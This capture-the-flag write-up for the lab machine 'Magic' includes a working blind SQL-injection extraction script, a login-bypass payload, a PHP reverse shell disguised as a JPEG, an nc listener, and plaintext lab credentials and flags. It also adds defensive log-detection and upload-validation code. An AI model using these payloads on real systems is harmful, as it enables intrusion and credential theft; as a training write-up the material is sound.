TL;DR

  • Extract the admin credentials with a redirect-based SQL injection.
  • Upload a PHP file disguised with an allowed extension and JPEG magic bytes to get a reverse shell.
  • Dump the database to get the user password.
  • Create a fake lshw script and prepend its directory to PATH to exploit the sysinfo SUID binary.

User.txt

Reconnaissance

Let’s start with an Nmap scan:

magnussen@funcMyLife:~/magic$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN magic.txt
# Nmap 7.60 scan initiated Sat Apr 18 22:08:05 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN magic.txt 10.10.10.185
Increasing send delay for 10.10.10.185 from 0 to 5 due to 117 out of 389 dropped probes since last increase.
Warning: 10.10.10.185 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.185 from 640 to 1000 due to 217 out of 723 dropped probes since last increase.
Nmap scan report for magic.htb (10.10.10.185)
Host is up, received reset ttl 63 (0.098s latency).
Scanned at 2020-04-18 22:08:05 CEST for 184s
Not shown: 49740 closed ports, 15793 filtered ports
Reason: 49740 resets and 15793 no-responses
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClcZO7AyXva0myXqRYz5xgxJ8ljSW1c6xX0vzHxP/Qy024qtSuDeQIRZGYsIR+kyje39aNw6HHxdz50XSBSEcauPLDWbIYLUMM+a0smh7/pRjfA+vqHxEp7e5l9H7Nbb1dzQesANxa1glKsEmKi1N8Yg0QHX0/FciFt1rdES9Y4b3I3gse2mSAfdNWn4ApnGnpy1tUbanZYdRtpvufqPWjzxUkFEnFIPrslKZoiQ+MLnp77DXfIm3PGjdhui0PBlkebTGbgo4+U44fniEweNJSkiaZW/CuKte0j/buSlBlnagzDl0meeT8EpBOPjk+F0v6Yr7heTuAZn75pO3l5RHX
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOVyH7ButfnaTRJb0CdXzeCYFPEmm6nkSUd4d52dW6XybW9XjBanHE/FM4kZ7bJKFEOaLzF1lDizNQgiffGWWLQ=
|   256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0dM4nfekm9dJWdTux9TqCyCGtW5rbmHfh/4v3NtTU1
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 18 22:11:09 2020 -- 1 IP address (1 host up) scanned in 184.15 seconds

So we find 2 useful services:

  • SSH (22)
  • Apache (80)

The website is an image gallery with a login form.

Website

Login

SQLi redirect

On the login form, we can see that a wrong username gives a 200 response, but a valid one gives a redirect (302).

Login Wrong

Login True

There are two ways to solve this step:

  • Bypass the login form with username=admin' OR 1; -- &password=test
  • Extract the password with a redirect-based SQLi.

We can extract the admin password with a redirect-based SQL injection: the response code tells us whether each guessed character of the password is correct (302 if it is, 200 otherwise).

We can use the following script to retrieve the password:

#!/usr/bin/python3.6
# coding: utf-8
import requests
import string

if __name__ == '__main__':
    url = 'http://magic.htb/login.php'
    params = {'username': 'admin', 'password': None}

    password = ""

    # Guess the password one position at a time: a 302 means the injected
    # comparison was true for this character, a 200 means it was not.
    for i in range(1, 30):
        for letter in string.printable:
            params['password'] = 'admin\' OR substr(password, {}, 1) = {};-- '.format(i, hex(ord(letter)))
            # Do not follow the redirect: the status code itself is the oracle.
            request = requests.post(url, data=params, allow_redirects=False)

            if request.status_code == 302:
                password += letter
                print('Password: ' + password)
                break

    print("Username: {0}\nPassword: {1}".format(params['username'], password))

We retrieve the password for admin: th3s3usw4sk1ng.

The comparison in the injection is case-insensitive: this value lets us log in to the website, but it will cause a problem later when we try to log in as the theseus user.
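From the defender's side, the oracle described above leaves a distinctive trace: one source POSTing to login.php many times per minute, mostly answered with 200 and occasionally with 302. The following Python is an added example (not part of this write-up) that runs that detection over constructed Apache combined-format log lines; the IPs, timestamps and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Fields we need from an Apache "combined" access-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for lines we cannot parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FORMAT)
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def find_login_bursts(lines, path="/login.php", threshold=20, window_s=60):
    """Flag source IPs that POST to `path` at least `threshold` times inside any
    `window_s`-second window. The result maps ip -> {"max_in_window", "redirects"};
    `redirects` counts 302 responses, i.e. guesses the oracle confirmed."""
    events = defaultdict(list)                       # ip -> [(timestamp, status), ...]
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, req_path, status = parsed
        if method == "POST" and req_path == path:
            events[ip].append((ts, status))

    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        peak = start = 0
        for end in range(len(evs)):                  # sliding window over sorted timestamps
            while (evs[end][0] - evs[start][0]).total_seconds() > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = {"max_in_window": peak,
                           "redirects": sum(1 for _, st in evs if st == 302)}
    return flagged


# Constructed sample log (not a real capture): one host hammering the oracle once per
# second with an occasional 302 hit, and one ordinary user who mistypes twice then logs in.
BASE = datetime(2020, 4, 18, 22, 30, 0, tzinfo=timezone.utc)


def make_line(ip, offset_s, status, ua="Mozilla/5.0", method="POST", path="/login.php"):
    ts = (BASE + timedelta(seconds=offset_s)).strftime(TS_FORMAT)
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 5521 "-" "{ua}"'


SAMPLE_LOG = [make_line("10.10.14.134", i, 302 if i % 10 == 0 else 200, "python-requests/2.23.0")
              for i in range(40)]
SAMPLE_LOG += [make_line("10.10.14.7", 0, 200), make_line("10.10.14.7", 90, 200),
               make_line("10.10.14.7", 200, 302),
               make_line("10.10.14.7", 205, 200, method="GET", path="/index.php")]

if __name__ == "__main__":
    for ip, info in find_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {info['max_in_window']} login POSTs within 60 s, {info['redirects']} redirects")
```

The same data would also justify rate limiting on login.php; the real fix for the oracle itself is a parameterised query, which removes the injected comparison entirely.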

File upload

We now have access to the upload page.

Upload

If we try to upload a PHP file, we get the following error: ‘Sorry, only JPG, JPEG & PNG files are allowed.’

Wrong upload

Let’s try to modify the extension with: ‘magnussen.php.test.jpg’

Upload Wrong

Nice, we get a different error message, so we’re on the right track. Let’s change the MIME type and the magic bytes in order to upload a reverse shell.

The magic bytes for a JPEG file are: FF D8 FF DB

Successful upload

It seems that we’ve managed to upload our reverse shell; let’s trigger it by requesting: magic.htb/images/uploads/magnussen.php.test.jpg

magnussen@funcMyLife:~/magic$ nc -lvp 7777
Listening on [0.0.0.0] (family 0, port 7777)
Connection from magic.htb 57776 received!
Linux ubuntu 5.3.0-42-generic #34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 11:25:27 up 13 min,  3 users,  load average: 0.63, 1.39, 0.92
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
theseus  pts/5    10.10.14.90      11:15    9:27   0.03s  0.03s -bash
theseus  pts/6    10.10.15.221     11:15    2:55   0.03s  0.03s -bash
theseus  pts/8    10.10.15.221     11:15    0.00s  0.03s  0.03s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
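The upload check above only looks at the extension and the leading bytes, which is exactly what the doubled extension and the pasted magic bytes bypass. As an added example (my code, not the box's upload.php), this Python validator walks the JPEG marker chain and the PNG chunk CRCs instead, and stores the file under a server-chosen random name with a single extension derived from the validated content; the sample files are constructed inline.

```python
import os
import secrets
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
EXT_FOR = {"jpeg": ".jpg", "png": ".png"}     # canonical extension per validated content type


def is_valid_jpeg(data: bytes) -> bool:
    """Walk the marker segments from SOI; accept only if a coherent chain of
    length-prefixed segments reaches SOS and the file ends with EOI (strict: no
    trailing junk). A file that merely starts with FF D8 FF DB fails because the
    bytes after the first marker are not a consistent segment chain."""
    if data[:2] != b"\xff\xd8":
        return False
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return False
        marker = data[pos + 1]
        if marker == 0xD8 or 0xD0 <= marker <= 0xD7:       # standalone markers carry no length
            pos += 2
            continue
        if marker == 0xD9:                                  # EOI before any scan data
            return False
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if length < 2:
            return False
        if marker == 0xDA:                                  # SOS: entropy-coded data follows
            return data.endswith(b"\xff\xd9")
        pos += 2 + length
    return False


def is_valid_png(data: bytes) -> bool:
    """Walk the chunk list, checking every CRC; require IHDR first and IEND last."""
    if not data.startswith(PNG_SIG):
        return False
    pos, expect_ihdr = len(PNG_SIG), True
    while pos + 12 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype, body_end = data[pos + 4:pos + 8], pos + 8 + length
        if body_end + 4 > len(data):
            return False
        if struct.unpack(">I", data[body_end:body_end + 4])[0] != zlib.crc32(data[pos + 4:body_end]):
            return False
        if expect_ihdr and ctype != b"IHDR":
            return False
        expect_ihdr, pos = False, body_end + 4
        if ctype == b"IEND":
            return pos == len(data)
    return False


def safe_upload_name(client_filename: str, data: bytes):
    """Return a server-chosen filename, or None to reject. The client's name is only
    checked for its LAST extension; the stored name is random with one extension
    derived from the validated content, so 'x.php.test.jpg' never reaches disk."""
    kind = "jpeg" if is_valid_jpeg(data) else "png" if is_valid_png(data) else None
    if kind is None:
        return None
    ext = os.path.splitext(client_filename)[1].lower().replace(".jpeg", ".jpg")
    if ext != EXT_FOR[kind]:                                # extension must match content
        return None
    return secrets.token_hex(16) + EXT_FOR[kind]


# Constructed samples: a structurally minimal JPEG and a 1x1 PNG (valid containers,
# not meaningful pictures) and a PHP file hidden behind JPEG magic bytes.
MINIMAL_JPEG = (b"\xff\xd8\xff\xdb" + struct.pack(">H", 67) + bytes(65)
                + b"\xff\xda" + struct.pack(">H", 8) + bytes(6) + b"\x12\x34\xff\xd9")
_chunk = lambda t, b: struct.pack(">I", len(b)) + t + b + struct.pack(">I", zlib.crc32(t + b))
MINIMAL_PNG = (PNG_SIG + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
               + _chunk(b"IDAT", zlib.compress(b"\x00\x00")) + _chunk(b"IEND", b""))
DISGUISED_PHP = b"\xff\xd8\xff\xdb" + b"<?php echo 'not an image'; ?>\n"
```

Content validation is only half of the fix: the upload directory should also be served with PHP execution disabled, so that even a file that slips through is returned as static data rather than run.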

Theseus user

Let’s see what we’ve got:

$ ls -alh /home/theseus
total 572K
drwxr-xr-x 15 theseus theseus 4.0K Apr 23 11:58 .
drwxr-xr-x  3 root    root    4.0K Oct 15  2019 ..
-rw-------  1 theseus theseus 7.2K Apr 15 23:50 .ICEauthority
lrwxrwxrwx  1 theseus theseus    9 Oct 21  2019 .bash_history -> /dev/null
-rw-r--r--  1 theseus theseus  220 Oct 15  2019 .bash_logout
-rw-r--r--  1 theseus theseus   15 Oct 21  2019 .bash_profile
-rw-r--r--  1 theseus theseus 3.7K Oct 15  2019 .bashrc
drwxrwxr-x 13 theseus theseus 4.0K Mar 13 05:57 .cache
drwx------ 13 theseus theseus 4.0K Oct 22  2019 .config
drwx------  3 theseus theseus 4.0K Oct 21  2019 .gnupg
drwx------  3 theseus theseus 4.0K Oct 21  2019 .local
drwx------  2 theseus theseus 4.0K Apr 23 11:51 .ssh
drwxr-xr-x  2 theseus theseus 4.0K Apr 23 11:58 Desktop
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Documents
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Downloads
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Music
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Pictures
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Public
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Templates
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Videos
-r--------  1 theseus theseus   33 Apr 23 11:50 user.txt
-rwsr-sr-x  1 theseus theseus 488K Apr 23 11:58 wget
$ ls -alh /var/www/Magic
total 52K
drwxr-xr-x 4 www-data www-data 4.0K Mar 17 09:10 .
drwxr-xr-x 4 root     root     4.0K Mar 13 06:07 ..
-rwx---r-x 1 www-data www-data  162 Oct 18  2019 .htaccess
drwxrwxr-x 6 www-data www-data 4.0K Jun  6  2019 assets
-rw-r--r-- 1 www-data www-data  881 Oct 16  2019 db.php5
drwxr-xr-x 4 www-data www-data 4.0K Apr 14 05:04 images
-rw-rw-r-- 1 www-data www-data 4.5K Oct 22  2019 index.php
-rw-r--r-- 1 www-data www-data 5.5K Oct 22  2019 login.php
-rw-r--r-- 1 www-data www-data   72 Oct 18  2019 logout.php
-rw-r--r-- 1 www-data www-data 4.5K Oct 22  2019 upload.php
$ cat /var/www/Magic/db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

Ok, so it seems that we have a user called theseus and the database credentials. Let’s try to switch to theseus with the password we retrieved from the SQL injection.

$ su theseus
su: must be run from a terminal
$ python -c 'import pty; pty.spawn("/bin/sh")'
/bin/sh: 4: python: not found
$ find / -name python 2>> /dev/null
/usr/share/bash-completion/helpers/python
/usr/share/bash-completion/completions/python
/usr/share/python
/usr/share/gcc-8/python
/usr/share/gdb/python
/snap/core18/1223/etc/apparmor.d/abstractions/python
/snap/core18/1223/usr/share/gcc-8/python
/snap/core18/1223/var/lib/python
/snap/core18/1668/etc/apparmor.d/abstractions/python
/snap/core18/1668/usr/share/gcc-8/python
/snap/core18/1668/var/lib/python
/snap/core/8689/etc/apparmor.d/abstractions/python
/snap/core/8689/usr/share/bash-completion/completions/python
/snap/core/8689/usr/share/gcc-5/python
/snap/core/8689/var/lib/python
/snap/core/7917/etc/apparmor.d/abstractions/python
/snap/core/7917/usr/share/bash-completion/completions/python
/snap/core/7917/usr/share/gcc-5/python
/snap/core/7917/var/lib/python
/etc/apparmor.d/abstractions/python
/var/lib/python
$ ls /var/lib/python
python3.6_installed
$ su theseus
su: must be run from a terminal
$ python3 -c 'import pty; pty.spawn("/bin/sh")'
$ su theseus
su theseus
Password: th3s3usw4sk1ng

su: Authentication failure

Ok, so first we had to get a proper shell (TTY), spawned with python3. The password we retrieved earlier isn’t valid because the SQL comparison in the injection was case-insensitive, so let’s dump the database and retrieve the real password.

$ mysqldump -u theseus --password=iamkingtheseus Magic
mysqldump -u theseus --password=iamkingtheseus Magic
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: Magic
-- ------------------------------------------------------
-- Server version	5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-04-23 12:05:25

The real password is “Th3s3usW4sK1ng”; let’s switch to theseus and retrieve user.txt.

$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:/$ cd  
cd
theseus@ubuntu:~$ cat user.txt
cat user.txt
b41026786625181e90e55a74f031b0bb

I AM ROOT

Sysinfo

Ok, we just have to privesc now; let’s check the SUID binaries.

theseus@ubuntu:~$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
-rwsr-xr-- 1 root dip 382696 Feb 11 07:05 /usr/sbin/pppd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 149080 Jan 31 09:18 /usr/bin/sudo
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 22528 Jun 28  2019 /usr/bin/arping
-rwsr-xr-x 1 root root 10312 Dec  9 02:03 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 10232 Dec 18 00:15 /usr/lib/xorg/Xorg.wrap
-rwsr-sr-x 1 root root 109432 Oct 30 05:17 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 43088 Aug 22  2019 /snap/core18/1223/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /snap/core18/1223/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /snap/core18/1223/bin/su
-rwsr-xr-x 1 root root 26696 Aug 22  2019 /snap/core18/1223/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /snap/core18/1223/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /snap/core18/1223/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /snap/core18/1223/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /snap/core18/1223/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /snap/core18/1223/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 17  2018 /snap/core18/1223/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 /snap/core18/1223/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/1223/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43088 Aug 22  2019 /snap/core18/1668/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /snap/core18/1668/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /snap/core18/1668/bin/su
-rwsr-xr-x 1 root root 26696 Aug 22  2019 /snap/core18/1668/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /snap/core18/1668/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /snap/core18/1668/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /snap/core18/1668/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /snap/core18/1668/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /snap/core18/1668/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Oct 10  2019 /snap/core18/1668/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 /snap/core18/1668/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/1668/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 40152 Jan 27 06:28 /snap/core/8689/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/8689/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/8689/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/8689/bin/su
-rwsr-xr-x 1 root root 27608 Jan 27 06:28 /snap/core/8689/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/8689/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/8689/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/8689/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/8689/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/8689/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 31 10:37 /snap/core/8689/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Nov 29 04:40 /snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/8689/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Feb 12 08:34 /snap/core/8689/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/8689/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 Aug 23  2019 /snap/core/7917/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/7917/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/7917/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/7917/bin/su
-rwsr-xr-x 1 root root 27608 Aug 23  2019 /snap/core/7917/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/7917/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/7917/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/7917/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/7917/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/7917/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10  2019 /snap/core/7917/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 /snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/7917/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Oct  1  2019 /snap/core/7917/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/7917/usr/sbin/pppd
-rwsr-xr-x 1 root root 26696 Jan  8 10:31 /bin/umount
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo
-rwsr-xr-x 1 root root 43088 Jan  8 10:31 /bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping

Mmmmh, after googling a few things I found out that sysinfo has a privilege escalation vulnerability. Let’s check how sysinfo works with pspy (results are truncated):

magnussen@funcMyLife:~/magic$ python -m SimpleHTTPServer
theseus@ubuntu:~$ wget 10.10.14.134:8000/pspy64
wget 10.10.14.134:8000/pspy64
--2020-04-23 12:16:11--  http://10.10.14.134:8000/pspy64
Connecting to 10.10.14.134:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===================>]   2.94M   169KB/s    in 20s     

2020-04-23 12:16:31 (154 KB/s) - ‘pspy64’ saved [3078592/3078592]
theseus@ubuntu:~$ sysinfo
====================Hardware Info====================
H/W path           Device      Class      Description
=====================================================
                               system     VMware Virtual Platform
/0                             bus        440BX Desktop Reference Platform
/0/0                           memory     86KiB BIOS
/0/2                           processor  AMD EPYC 7401P 24-Core Processor
/0/2/0                         memory     16KiB L1 cache
/0/2/1                         memory     16KiB L1 cache
/0/2/2                         memory     512KiB L2 cache
/0/2/3                         memory     512KiB L2 cache
/0/3                           processor  AMD EPYC 7401P 24-Core Processor
/0/28                          memory     System Memory
/0/28/0                        memory     4GiB DIMM DRAM EDO
/0/28/1                        memory     DIMM DRAM [empty]
/0/100                         bridge     440BX/ZX/DX - 82443BX/ZX/DX Host bridge
/0/100/18.7                    bridge     PCI Express Root Port
/0/47              scsi0       storage    
/0/47/0.0.0        /dev/cdrom  disk       VMware IDE CDR00
/1                             system     

====================Disk Info====================
Disk /dev/loop0: 44.9 MiB, 47063040 bytes, 91920 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Device     Boot Start      End  Sectors Size Id Type
/dev/sda1  *     2048 41940991 41938944  20G 83 Linux

Disk /dev/loop11: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

====================CPU Info====================
processor	: 0
vendor_id	: AuthenticAMD
cpu family	: 23
model		: 1
model name	: AMD EPYC 7401P 24-Core Processor
stepping	: 2
microcode	: 0x8001230
cpu MHz		: 2000.000
cache size	: 512 KB
physical id	: 0
siblings	: 1
core id		: 0
cpu cores	: 1
apicid		: 0
initial apicid	: 0
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
